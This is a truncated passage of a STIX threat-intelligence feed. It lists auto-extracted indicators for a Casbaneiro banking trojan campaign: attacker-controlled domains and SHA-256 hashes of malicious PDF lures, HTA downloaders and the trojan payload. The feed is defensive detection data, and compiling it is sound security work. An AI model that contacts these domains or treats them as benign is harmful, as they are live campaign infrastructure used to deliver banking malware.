News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10b991eb-7b32-4d7c-975a-7583301ddbaa","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8dd8e26c-846f-4e5d-96f9-e7b2265b1b67","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 135.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]","pattern":"[domain-name:value = '135.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--348b3509-a766-4bec-b389-a89123aac8c0","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 162.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[","pattern":"[domain-name:value = '162.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a3c481d-0295-4952-ad10-115a61dabb68","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 181.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[","pattern":"[domain-name:value = '181.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0da30fad-3411-4ffd-b4db-b193ce3df69b","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 48.178.169.192.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[","pattern":"[domain-name:value = '48.178.169.192.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a432e62e-5f29-463f-b7be-f32171681c02","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 76.180.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]co","pattern":"[domain-name:value = '76.180.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f152843-c5a7-4efe-890f-3382f00144be","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 85.182.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[","pattern":"[domain-name:value = '85.182.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--86a2762d-c14f-436b-90cb-29f2b970c2b1","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: gexwalltool.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]c","pattern":"[domain-name:value = 'gexwalltool.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e84bc8a7-8e18-4f3b-a68d-15230a5dbc91","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: x-wolverine.servebbs.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 C","pattern":"[domain-name:value = 'x-wolverine.servebbs.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ebdc6377-6b0d-44b7-9221-9ce5ca1afffb","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 1b17917e2e183a4bd9cbcb2ed77e Malicious PDF lure PDF SHA-256 0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a Malicious PDF lure Email SHA-256 debe871710268e7bb770b72c67","pattern":"[file:hashes.'SHA-256' = '0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--027b475c-0de1-42f7-975b-0e43654362bf","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 659880e1a8a7b0a2dd851dc5e7a3 Malicious PDF lure PDF SHA-256 0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5 Malicious PDF lure PDF SHA-256 c521b3a189b0089a2558aa4e42bd","pattern":"[file:hashes.'SHA-256' = '0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b286267d-4f91-439e-b47c-1ab879cb85c6","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 4a2145348b953b1d06e2eaf0bf2c Malicious PDF lure PDF SHA-256 1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed Malicious PDF lure PDF SHA-256 62ef39ec29966d71c8254f68bd5e","pattern":"[file:hashes.'SHA-256' = '1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4f5f38e-3d8c-46b1-b732-f002ae1292db","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 042d76c12dbafdcc0766861827c5 Malicious PDF lure PDF SHA-256 1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491 Malicious PDF lure PDF SHA-256 ea8af591fe2d605c82bb7831d2eb","pattern":"[file:hashes.'SHA-256' = '1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be38bb9a-db8d-4a67-be58-b62772c683b2","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 64f8db457bafafb97a011da59e73 Malicious PDF lure PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd Malicious PDF lure PDF SHA-256 bf92a287a3d79afb73a3f2d38877","pattern":"[file:hashes.'SHA-256' = '40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4d9cd51a-0021-4cfe-8aff-849491c2aea6","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 89eb6b87bb0 2f0bd59d565 Phishing email artifact HTA SHA-256 4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044 HTA downloader HTA SHA-256 85767416f8d1e73833ccaa193263d119","pattern":"[file:hashes.'SHA-256' = '4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--11a94e76-fe93-4c9a-997d-e4194ed8d04c","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 246d3d50110c6b0c248919ad796c6fd4 HTA downloader HTA SHA-256 4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697 HTA downloader HTA SHA-256 92a1428e125f33de012c7f52fb0827be","pattern":"[file:hashes.'SHA-256' = '4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a4684b99-0368-4e0f-92e8-b5edc0db21af","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ca6e1b70fe30ba3752b881574365 Malicious PDF lure PDF SHA-256 47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95 Malicious PDF lure PDF SHA-256 d13ad6fc5fda54e65f1214e554a5","pattern":"[file:hashes.'SHA-256' = '47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4336429e-d7b3-4d3f-8bba-1d1505f921c3","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 3b5c42dd2a33b5a6520159b41c43b093 HTA downloader HTA SHA-256 51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c HTA downloader HTA SHA-256 5b3c2442831d4844ea6b86942f1a0ba2","pattern":"[file:hashes.'SHA-256' = '51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f90050a3-edd7-4ad8-8dda-aa4874ed481b","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: f537a02949315eb768c88906b0c65add HTA downloader HTA SHA-256 5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e HTA downloader HTA SHA-256 8092b9de455463296898fcaf8c9955d1","pattern":"[file:hashes.'SHA-256' = '5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cd31815e-4a05-4b67-a142-5b369116c54f","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 5b3c2442831d4844ea6b86942f1a0ba27170018382cbc362343db63717d0ff02","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: c8224686669ba4b64196591414fdc64c HTA downloader HTA SHA-256 5b3c2442831d4844ea6b86942f1a0ba27170018382cbc362343db63717d0ff02 HTA downloader HTA SHA-256 71dea06c2271a46fc2fd6092e2ba0c2f","pattern":"[file:hashes.'SHA-256' = '5b3c2442831d4844ea6b86942f1a0ba27170018382cbc362343db63717d0ff02']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f438613c-4220-4cf4-bfaa-2d6965a1e6f2","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 62ef39ec29966d71c8254f68bd5e320cf24a042d76c12dbafdcc0766861827c5","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: badab12bcdcb47f3dad8bc6fa8ed Malicious PDF lure PDF SHA-256 62ef39ec29966d71c8254f68bd5e320cf24a042d76c12dbafdcc0766861827c5 Malicious PDF lure PDF SHA-256 1f1a89bef73e4866a198a08e750f","pattern":"[file:hashes.'SHA-256' = '62ef39ec29966d71c8254f68bd5e320cf24a042d76c12dbafdcc0766861827c5']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce5ae318-6acb-412b-8eb6-b22b2b8a047c","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 6547736c31dabb5bef2a290b32a72bf63b5c42dd2a33b5a6520159b41c43b093","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 02b1b25b78e5f3707e81bad5054cf4e8 HTA downloader HTA SHA-256 6547736c31dabb5bef2a290b32a72bf63b5c42dd2a33b5a6520159b41c43b093 HTA downloader HTA SHA-256 51503ce1373c7fa72a1da5c5c4b30f88","pattern":"[file:hashes.'SHA-256' = '6547736c31dabb5bef2a290b32a72bf63b5c42dd2a33b5a6520159b41c43b093']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc57ff99-3acc-4fdd-9b42-28a4fbd7eac9","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: compromise (IoCs):- Type Indicator Description PDF SHA-256 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73 Malicious PDF lure PDF SHA-256 40d253480f752805e58c21266e40","pattern":"[file:hashes.'SHA-256' = '6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c2fb449-cc10-48df-832b-27e5db4db913","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 6e6bd2f7566ffa52d52fa9d5f048bbb9246d3d50110c6b0c248919ad796c6fd4","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: aff294f5250c2eed406765032cb68756 HTA downloader HTA SHA-256 6e6bd2f7566ffa52d52fa9d5f048bbb9246d3d50110c6b0c248919ad796c6fd4 HTA downloader HTA SHA-256 4540c3af3b1d8c52256f4580dd4d002f","pattern":"[file:hashes.'SHA-256' = '6e6bd2f7566ffa52d52fa9d5f048bbb9246d3d50110c6b0c248919ad796c6fd4']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--101fe3ab-5176-446b-a374-47dc3d1c6764","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 711c0aa8cde078aa349fb329e3e44e4272ea66a5e651ad8a64893c76a725c859","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ff91c829d87f566bee453d715280 Malicious PDF lure PDF SHA-256 711c0aa8cde078aa349fb329e3e44e4272ea66a5e651ad8a64893c76a725c859 Malicious PDF lure PDF SHA-256 d910e08a11a4f6f764e7495f4602","pattern":"[file:hashes.'SHA-256' = '711c0aa8cde078aa349fb329e3e44e4272ea66a5e651ad8a64893c76a725c859']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8dad02c5-4bf8-4dd0-8dff-a7230f2ace7a","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 71dea06c2271a46fc2fd6092e2ba0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 7170018382cbc362343db63717d0ff02 HTA downloader HTA SHA-256 71dea06c2271a46fc2fd6092e2ba0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secures","pattern":"[file:hashes.'SHA-256' = '71dea06c2271a46fc2fd6092e2ba0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bdd0d05e-476b-4269-882c-ebd8e207d656","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 7de637539159dc17ceedb0aae783930ee68639b6d8036ef8147027c5ebca3fc8","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 5d7407ba AutoIt loader component Casbaneiro payload SHA-256 7de637539159dc17ceedb0aae783930ee68639b6d8036ef8147027c5ebca3fc8 Casbaneiro payload Cryptocurrency address 0xb4c12078448fdef","pattern":"[file:hashes.'SHA-256' = '7de637539159dc17ceedb0aae783930ee68639b6d8036ef8147027c5ebca3fc8']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1934a085-0ae4-4aa7-b4f8-8531e6e179f0","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 7e04e86c07213fed7bebccd9953818b102b1b25b78e5f3707e81bad5054cf4e8","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 2abf7f72ef093292c86c1e9e7c2be456 HTA downloader HTA SHA-256 7e04e86c07213fed7bebccd9953818b102b1b25b78e5f3707e81bad5054cf4e8 HTA downloader HTA SHA-256 6547736c31dabb5bef2a290b32a72bf6","pattern":"[file:hashes.'SHA-256' = '7e04e86c07213fed7bebccd9953818b102b1b25b78e5f3707e81bad5054cf4e8']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--37cb4dee-5528-43df-9b9d-9a904c5f91f6","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 8092b9de455463296898fcaf8c9955d1c00dae6812c03bba019edf9c059ece33","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 976b299ee27c5fc3d42f2673170ab95e HTA downloader HTA SHA-256 8092b9de455463296898fcaf8c9955d1c00dae6812c03bba019edf9c059ece33 HTA downloader HTA SHA-256 99fcabf7c996d6ec077ccd745a158a3a","pattern":"[file:hashes.'SHA-256' = '8092b9de455463296898fcaf8c9955d1c00dae6812c03bba019edf9c059ece33']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ff556508-3843-4de8-a6f8-fd42b7cad1b5","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 85767416f8d1e73833ccaa193263d1198857308b3a1185e6f4ebc4164db8584f","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 50c8155ed113f3f62337d756e6915044 HTA downloader HTA SHA-256 85767416f8d1e73833ccaa193263d1198857308b3a1185e6f4ebc4164db8584f HTA downloader HTA SHA-256 f1aa14ebfd2da477edba94b34f09f775","pattern":"[file:hashes.'SHA-256' = 